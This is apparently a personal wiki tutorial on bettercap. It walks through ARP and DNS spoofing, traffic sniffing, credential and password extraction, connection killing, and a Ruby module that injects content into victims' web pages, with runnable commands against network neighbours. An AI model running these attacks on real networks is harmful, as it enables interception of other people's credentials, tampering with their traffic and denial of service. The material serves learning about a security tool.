From charlesreid1

Project page: https://www.bettercap.org/

What is bettercap?

Bettercap is a better version of Ettercap. The intention was to create a new tool that worked the same, but better.

But what is it, really? It has two objectives: first, it is a tool for sniffing traffic, and second, it is a tool for carrying out man in the middle attacks (which enables the first type of attack - sniffing the traffic of your network neighbors).

Like Ettercap, Bettercap has several nice features:

  • half and full duplex ARP spoofing
  • ICMP/DNS/NDP spoofing
  • Host discovery
  • Credentials harvesting for multiple protocols (POST, HTTPS, FTP, IRC, POP, SMTP, etc)
  • Customizable sniffer
  • Modular HTTP/HTTPS proxies to allow for injection of custom HTML, JS, CSS code or urls
  • SSLStripping with HSTS bypass

Dependencies

To install bettercap, you need ruby and libpcap:

$ apt-get install build-essential ruby-dev libpcap-dev

Install

Now install the bettercap gem:

$ gem install bettercap
$ gem update bettercap

Bettercap Help and Command Line Options

Let's take a look at some of the important flags. Here's the help:

$ bettercap --help

Usage: bettercap [options]

MAIN:

    -I, --interface IFACE            Network interface name - default: wlan1
        --use-mac ADDRESS            Change the interface MAC address to this value before performing the attack.
        --random-mac                 Change the interface MAC address to a random one before performing the attack.
    -G, --gateway ADDRESS            Manually specify the gateway address, if not specified the current gateway will be retrieved and used.
    -T, --target ADDRESS1,ADDRESS2   Target IP addresses, if not specified the whole subnet will be targeted.
        --ignore ADDRESS1,ADDRESS2   Ignore these addresses if found while searching for targets.
        --no-discovery               Do not actively search for hosts, just use the current ARP cache, default to false.
        --no-target-nbns             Disable target NBNS hostname resolution.
        --packet-throttle NUMBER     Number of seconds ( can be a decimal number ) to wait between each packet to be sent.
        --check-updates              Will check if any update is available and then exit.
    -h, --help                       Display the available options.

LOGGING:

    -O, --log LOG_FILE               Log all messages into a file, if not specified the log messages will be only print into the shell.
        --log-timestamp              Enable logging with timestamps for each line, disabled by default.
    -D, --debug                      Enable debug logging.
        --silent                     Suppress every message which is not an error or a warning, default to false.

SPOOFING:

    -S, --spoofer NAME               Spoofer module to use, available: NONE, ICMP, ARP - default: ARP.
        --no-spoofing                Disable spoofing, alias for --spoofer NONE.
        --half-duplex                Enable half-duplex MITM, this will make bettercap work in those cases when the router is not vulnerable.
        --kill                       Instead of forwarding packets, this switch will make targets connections to be killed.

SNIFFING:

    -X, --sniffer                    Enable sniffer.
    -L, --local                      Parse packets coming from/to the address of this computer ( NOTE: Will set -X to true ), default to false.
        --sniffer-source FILE        Load packets from the specified PCAP file instead of the interface ( will enable sniffer ).
        --sniffer-output FILE        Save all packets to the specified PCAP file ( will enable sniffer ).
        --sniffer-filter EXPRESSION  Configure the sniffer to use this BPF filter ( will enable sniffer ).
    -P, --parsers PARSERS            Comma separated list of packet parsers to enable, '*' for all ( NOTE: Will set -X to true ), available: FTP, REDIS, 
TEAMVIEWER, MAIL, SNPP, NTLMSS, WHATSAPP, DHCP, URL, PGSQL, CREDITCARD, IRC, DICT, COOKIE, RLOGIN, NNTP, MYSQL, HTTPS, 
POST, SNMP, MPD, HTTPAUTH - default: *
        --custom-parser EXPRESSION   Use a custom regular expression in order to capture and show sniffed data ( NOTE: Will set -X to true ).

PROXYING:


  TCP:

        --tcp-proxy                  Enable TCP proxy ( requires other --tcp-proxy-* options to be specified ).
        --tcp-proxy-module MODULE    Ruby TCP proxy module to load.
        --tcp-proxy-port PORT        Set local TCP proxy port, default to 2222 .
        --tcp-proxy-upstream ADDRESS:PORT
                                     Set TCP proxy upstream server address and port.
        --tcp-proxy-upstream-address ADDRESS
                                     Set TCP proxy upstream server address.
        --tcp-proxy-upstream-port PORT
                                     Set TCP proxy upstream server port.
  HTTP:

        --proxy                      Enable HTTP proxy and redirects all HTTP requests to it, default to false.
        --proxy-port PORT            Set HTTP proxy port, default to 8080.
        --allow-local-connections    Allow direct connections to the proxy instance, default to false.
        --no-sslstrip                Disable SSLStrip.
        --proxy-module MODULE        Ruby proxy module to load, either a custom file or one of the following: injecthtml, injectcss, injectjs.
        --http-ports PORT1,PORT2     Comma separated list of HTTP ports to redirect to the proxy, default to 80.
        --proxy-upstream-address ADDRESS
                                     If set, only requests coming from this server address will be redirected to the HTTP/HTTPS proxies.

  HTTPS:

        --proxy-https                Enable HTTPS proxy and redirects all HTTPS requests to it, default to false.
        --proxy-https-port PORT      Set HTTPS proxy port, default to 8083.
        --proxy-pem FILE             Use a custom PEM CA certificate file for the HTTPS proxy, default to /root/.bettercap/bettercap-ca.pem .
        --https-ports PORT1,PORT2    Comma separated list of HTTPS ports to redirect to the proxy, default to 443.

  CUSTOM:

        --custom-proxy ADDRESS       Use a custom HTTP upstream proxy instead of the builtin one.
        --custom-proxy-port PORT     Specify a port for the custom HTTP upstream proxy, default to 8080.
        --custom-https-proxy ADDRESS Use a custom HTTPS upstream proxy instead of the builtin one.
        --custom-https-proxy-port PORT
                                     Specify a port for the custom HTTPS upstream proxy, default to 8083.
        --custom-redirection RULE    Apply a custom port redirection, the format of the rule is PROTOCOL ORIGINAL_PORT NEW_PORT. 
For instance TCP 21 2100 will redirect all TCP traffic going to port 21, to port 2100.

SERVERS:

        --httpd                      Enable HTTP server, default to false.
        --httpd-port PORT            Set HTTP server port, default to 8081.
        --httpd-path PATH            Set HTTP server path, default to ./ .
        --dns FILE                   Enable DNS server and use this file as a hosts resolution table.
        --dns-port PORT              Set DNS server port, default to 5300.

For examples & docs please visit http://bettercap.org/docs/

Bettercap Most Important Flags

Most important flags are as follow:

    -T: specify MiTM targets (IP or MAC)
    -I: interface to use
    -G: specify gateway address (usually automatic)
    --no-discovery: don’t search for hosts (use ARP cache)
    --ignore: ignore ADDRESS1,ADDRESS2
    --check-updates: you guessed it
    -h: get your options

Sniffing vs Spoofing

Like Ettercap, Bettercap has two functions:

  • Sniff traffic
  • Spoof traffic from other computers on the network through various attacks

Sniffing

TLDR: sniffing is what you do when you can see traffic that is not yours.

The simplest sniffing scenario is if you're sitting on a network hub (on which all traffic is broadcast to all ports) and sniffing all of the traffic that comes through that port. In this scenario, you have perfect visibility of all the traffic on a network. Normally you cannot sniff traffic because the network card will drop traffic not addressed to it, and because the network card will not forward packets. Sniffing tools fix that.

Spoofing

TLDR: spoofing is what you do when you cannot see traffic that is not yours - it's a way of maliciously capturing traffic.

If you're on a network switch or a wifi network, you will not have visibility of all packets on the network. If you are on a network switch, your port physically does not receive packets not intended for your device. If you are on a wifi network, your wifi card will drop frames not intended for your computer, and even if you kept the frames, you would be missing data, and would have an imperfect picture of the traffic.

The problem is resolved through spoofing. With spoofing, you can carry out attacks at Level 3, the packet level, by spoofing packets from different computers. For example, ARP spoofing sends out fake ARP reply packets, confusing network neighbors.

Basic Usage

Spoofing with bettercap

Let's run through your basic ARP poisoning attack.

-S specifies your spoofing method - either ARP or ICMP

--kill kills connections for any clients

--half-duplex is useful when you can't MITM the router - that is, when the router has protective mechanisms in place to prevent its ARP table from being corrupted. This type of attack gives you control over all traffic that is leaving, but not traffic that is coming to, the sheep.

$ bettercap -I wlan1 -O bettercap.log -S ARP

or add the -X flag (sniffer mode, covered below):

Sniffing with bettercap

By default, bettercap is not in sniffing mode, it is in MITM mode. You can run in sniffing mode only, or in MITM only, or in combination - bettercap is flexible.

-X turns on sniffer mode.

$ bettercap -I wlan1 -O bettercap.log -S ARP -X

Targeted sniffing with bettercap

Use the target flag to specify a target on the network:

$ bettercap -I wlan1 -O bettercap.log -S ARP -X --target 192.168.0.7

To Explore

Using proxy to replace web content

SSL

Ninja Dispatcher Silently Kills Network Connection

--kill

Instead of forwarding packets, this switch will make targets connections to be killed.

Sorry 192.168.1.2, you won’t connect to anything anymore.

sudo bettercap -T 192.168.1.2 --kill

Proxying

Bettercap has the capability to run a built-in http/https/tcp proxy server, allowing it to monitor, modify, inspect, inject, or drop http/https/tcp traffic (although https is a little harder, of course. See Man in the Middle/Traffic Injection for more info.) The https proxy server uses SSL Stripping and HSTS Bypass. The tcp proxy server uses raw TCP transparent proxies.

In practice, this means you have the ability to do whatever you want with the unencrypted (and potentially, if compromised, encrypted) communications going to or from a machine, including but certainly not limited to:

  • Injecting Javascript on the target's visited pages (see Beef framework notes)
  • Replacing every image in someone's web traffic with images of kittens and puppies (tool?)
  • Downgrading encryption for a TLS conversation with STARTTLS
  • Dumping custom protocols

Bettercap implements firewall rules and spoofing attack needed to redirect target traffic through the http/https/tcp proxy - eyyyy, don' worry 'bout it. You got bettercap to do than babysitting your attack.

There are 3 injection modules available:

  • injecthtml
  • injectcss
  • injectjs

HTML injection

First, you can get help for a proxy module at the module level (general bettercap help provides zero information about how to use injection modules):

bettercap --proxy-module injecthtml -h 

This outputs bettercap help, and at the very end, injecthtml help. This tells us we have two different options for injecting html:

--html-data to specify HTML code we want to inject, or --html-iframe-url to specify the URL of an iframe to be injected

JS injection

CSS injection

Custom Injection Module

Here's an example of a custom module that performs a custom action. Remember, this operates on the actual HTML content of the page that the sheep is going to receive. (Amaaaaazoooooong.)

class HackTitle < BetterCap::Proxy::HTTP::Module
  meta(
    'Name'        => 'HackTitle',
    'Description' => 'Adds a "!!! HACKED !!!" string to every webpage title.',
    'Version'     => '1.0.0',
    'Author'      => "Simone 'evilsocket' Margaritelli",
    'License'     => 'GPL3'
  )
  
  # called before the request is performed
  def on_pre_request( request ); end

  # this method is called after the request is performed
  def on_request( request, response )
    # is it a html page?
    if response.content_type =~ /^text\/html.*/
      BetterCap::Logger.info "Hacking http://#{request.host}#{request.url}"
      # make sure to use sub! or gsub! to update the instance
      response.body.sub!( '<title>', '<title> !!! HACKED !!! ' )
    end
  end
end

More Modules

Repository of all kinds of bettercap custom modules: https://github.com/evilsocket/bettercap-proxy-modules

DNS Spoofing

What is DNS?

Turns domain names like "google.com" into server IP addresses like "100.250.398.120"

See Linux/DNS

DNS Spoofing

With DNS spoofing, the attacker tricks the sheep into redirecting all of its DNS requests to the attacker, instead of to the gateway. This is a more selective attack than sniffing all of the sheep's traffic, as now we're simply listening for DNS requests.

Executing the Attack

Our first DNS attack will be more of a "hello world" attack - a denial of service on facebook.com.

Instead of seeing facebook.com, we want sheep to see this:

Nope.jpg

We'll host this image on a simple static HTML page using Bettercap's built-in lightweight http server (similar to the traffic modification attack where we replaced all the images in the sheep's New York Times news stream). We'll monitor the sheep's DNS requests, forwarding anything uninteresting. Whenever we detect a DNS request for facebook.com, Bettercap's DNS server will redirect the sheep to the attacker machine, and the sheep will see:

NOPE

Create Malicious Entries

Create a DNS configuration file with your malicious entries. I called mine extrabacon.conf.

extrabacon.conf:

# Empty lines or lines starting with # will be ignored.

# redirect *.facebook.com to the attacker ip address
local .*facebook\.com

Preparing Static Content

We will host the static content (1 html file, 1 image) required to deny sheep access to their precious facebook. I put everything into a pub/ directory, which is where I'll point bettercap when I tell it to run a public web server:

$ ls pub/
index.html
nope.jpg

Here are the contents of that index.html page to host the NOPE image:

<html>
<body style="background-color: #000;">
<img src="nope.jpg" alt="NOPE" />
</body>
</html>

Firewall Redirect Port 80 to 8081 (bad idea)

The DNS redirection will only redirect sheep to the attacker, not to a port. Redirect all the attacker's port 80 http traffic to port 8081, where the Bettercap HTTP server will be running:

$ iptables -F
$ iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8081

You can test this out by typing "localhost" into your browser's address bar - it should redirect you to localhost:8081, and you should see NOPE.

Actually, the whole reason I had problems with the DNS spoofing was because bettercap was actually already doing this by default. This interferes with traffic your DNS attack is NOT supposed to filter out.

Bettercap DNS Spoofing Attack

Attempt 1 was a failure. Notes here: Bettercap/Failed DNS Spoofing Attack

Attempt 2 was a failure. Notes here: Bettercap/Failed DNS Spoofing Attack 2

kevin2k sez:

hi, you can add --httpd-port 80 to the command, because http server default port is 80. 

One-Liners

Use bettercap as a simple local sniffer:

sudo bettercap -L

Spoof the whole network and save every packet to the capture.pcap file in your home directory:

sudo bettercap --sniffer-output ~/capture.pcap

Spoof the whole network but only sniff HTTP traffic:

sudo bettercap --sniffer-filter "tcp port http"

Spoof the whole network and extract data from packets containing the “password” word:

sudo bettercap --custom-parser ".*password.*"

Links

Project page: https://www.bettercap.org/

Basics: http://www.darknet.org.uk/2016/03/bettercap-modular-portable-mitm-framework/

Bettercap tutorial: https://danielmiessler.com/study/bettercap/

Flags